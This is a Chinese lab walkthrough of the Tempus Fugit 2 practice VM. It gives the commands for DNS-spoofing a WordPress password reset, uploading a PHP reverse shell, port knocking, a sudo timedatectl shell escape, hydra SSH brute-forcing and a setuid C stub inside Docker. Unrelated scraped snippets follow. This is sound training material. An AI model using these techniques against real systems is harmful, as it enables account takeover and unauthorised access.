TEMPUS FUGIT: 2
环境准备
靶机链接:百度网盘 请输入提取码
提取码:5i9p
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2022.03
信息收集
1.对靶机进行端口和服务的扫描
nmap -sV -p- -A 10.10.10.130
可以看到22端口是关闭的
2.用gobuster扫描目录
gobuster dir -u http://10.10.10.130/ -w /usr/share/wordlists/dirb/big.txt -t 100
漏洞利用
1.访问网页,进入wordpress登录界面
2.发现一个域名写入/etc/hosts
3.用wpscan 进行用户枚举
wpscan --url http://tf2/ -e u
4.输入admin点击丢失密码
5.他这里说email发不了啥的。
6.用wireshark进行截取流量,发现dns
7.本地开启smtp服务,进行劫持
python -m smtpd -n -c DebuggingServer 10.10.10.128:25
vi /etc/ettercap/etter.dns
*.tempusfugit2.com A 10.10.10.128
所有访问域名的流量,会转到本地
8.ettercap -G 开启工具,设置目标ip
9.进行dns_spoof
10.回到登录网页,点击丢失密码
11.这边就成功劫持到,修改密码的链接
12.访问网址,查看到密码
http://TF2/wp-login.php?action=rp&key=c9tsuIZcEqW6qSoB4hBs&login=admin
m^F13sBwxPyGenqN
13.成功登录wordpress界面
14.修改404.php为php-reverse-shell.php的源码(github里有)
权限提升
1.反弹交互式shell
SHELL=bash script -q /dev/null
2.在网站的配置文件里发现,用户名密码
ElvisP
super.Secret.SQL.Password.For.ElvisP
3.并且这个shell是一个容器的shell
4.在/var/www/html/wp-content/TFDocuments/发现nb.txt
5.对内容进行base64解密,应该是用户名和密码
echo "ZG9ubjo5ZjRsdzByODJ5bzMK" | base64 -d
9f4lw0r82yo3
6.因为22端口是关闭的,只能通过knock敲门来打开
7.开启22端口
knock 10.10.10.130 1981 867 5309
8.成功登录donn用户
ssh donn@10.10.10.130
9.进行提权操作
sudo -u auria /usr/bin/timedatectl list-timezones
!/bin/sh
10.成功提权到auri用户
11.对auria用户进行爆破得到密码gateway
hydra -l auria -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.130 -t 50
gateway
12.登录auria用户后 ,发现该用户具有root权限免密执行/usr/bin/docker exec *
ssh auria@10.10.10.130
13.登录容器
sudo /usr/bin/docker exec -it 1786dd63dedb bash
cd /root/wp/wp-content
vi suid
int main(void) {setgid(0); setuid(0);execl("/bin/sh","sh",0);
}
根据之前root路径下有一个网站的wp-content文件夹,怀疑是主机与容器共享一个文件夹,通过刚刚的反弹shell(www-data用户权限)在/var/www/html/wp-content文件夹下面创建一个文件,
然后回来查看/root/wp/wp-content/文件夹确实多了一文件
最终提权失败!
参考:Tempus fugit 2 writeup
Tempus Fugit 2 靶机练习__誠的博客-CSDN博客
TEMPUS FUGIT: 2相关推荐
- X-Files 目录及剧情简介
X-Files 第(1)季目录及剧情简介 1X01 领航员 Pilot 1X02 深喉咙 DEEP THROAT 1X03 突变异种 SQUEEZE 1X04 奥卡布基湖奇案 CONDUIT 1X05 ...
- Similique cum vero non harum voluptatum quasi.Voluptatum quo veniam assumenda vel quisquam fugit.
这里写自定义目录标题 Aut facilis sequi vitae.Odio dolorem possimus.
- 使用CSS将文字长度限制为n行
是否可以使用CSS将文本长度限制为" n"行(或在垂直溢出时将其剪切). text-overflow: ellipsis; 仅适用于1行文字. 原文: 纳图克足癣,阿里卡姆,克拉斯 ...
- 前端追梦人响应式网页设计
一. 响应式元素及媒介 1.1 基于宽度百分比的图像缩放 <!DOCTYPE html> <html lang="en"> <head>< ...
- python gui编程框架添加工具栏_python gui编程,我是初学者。用tk,制作下拉菜单的command不分我想打开另一个界面。如和解决,求解!!...
展开全部 from tkinter import * def new_file(): print("Open new file") def open_file(): print(& ...
- Nat. Biotechnol. | 人工智能药物研发在中国蓬勃发展
中国的新锐公司和IT巨头希望将中国的人工智能能力转化为世界领先的药物创新,他们是否比西方企业更有优势? 中国的研究人员正在积极的探索以AI技术为基础的新药发现新范式.就在上个月,三个中国企业筹集了巨额 ...
- 每周AI应用方案精选:虹膜识别;基于深度学习人脸识别方案等
2019-12-12 17:52:41 每周三期,详解人工智能产业解决方案,让AI离你更近一步. 解决方案均选自机器之心Pro行业数据库. 方案1:虹膜识别解决方案 解决方案简介: 虹膜识别技术是基于 ...
- 人工智能与经济生产力:期待进化,而不是革命
Illustration: Edmon de Haro 来源: IEEE电气电子工程师 尽管大肆宣传,人工智能仍需数年时间才能显著提高经济生产力. 2016年,总部位于伦敦的Alphabet(也是谷歌 ...
- python动态网页开发教程_python django创建一个属于自己的动态网站
您如何开始使用Python创建网站?好吧,你可以自己完成所有工作,并编写一个在Web服务器上运行的程序,接受页面请求并以HTML和其他资源的形式提供响应.然而,这是很多工作,那么为什么在有大量现有工具 ...
最新文章
- golang 函数结束后 goroutine退出机制
- Python基础问题
- Httpd之检测与安装
- 通过Playbook部署LAMP(5)
- CityEngine生成不等间距桥墩
- MATLAB软件禁用利好,Matlab被禁用?一款国产软件站了出来说:我就是中国的Matlab...
- php yii把pdf转成图片,yii实现图片上传及缩略图生成的方法
- MySQL中 JSON 数据类型应用
- boost::filesystem使用手册
- 项目经理,你真的是资源不足吗?
- 苹果计算机音频无法使用,解决Mac电脑直播没有电脑内声音的问题
- win10修改用户名_win10最详细优化设置|win10专业版笔记本优化教程
- html5情人节贺卡,情人节贺卡祝福语
- 2019年6月18号 AndroidStudio+夜神模拟器 搭建Xposed环境
- 实现XP自动登录的方法
- 神仙级编程神器,吹爆
- 中国电力自动化行业发展态势与前景建议报告2022-2028年版
- 怎么设置永磁同步电机的电流控制角
- 八款最优秀的免费翻译相关软件推荐
- mac录屏软件推荐!相信我,看完你不会后悔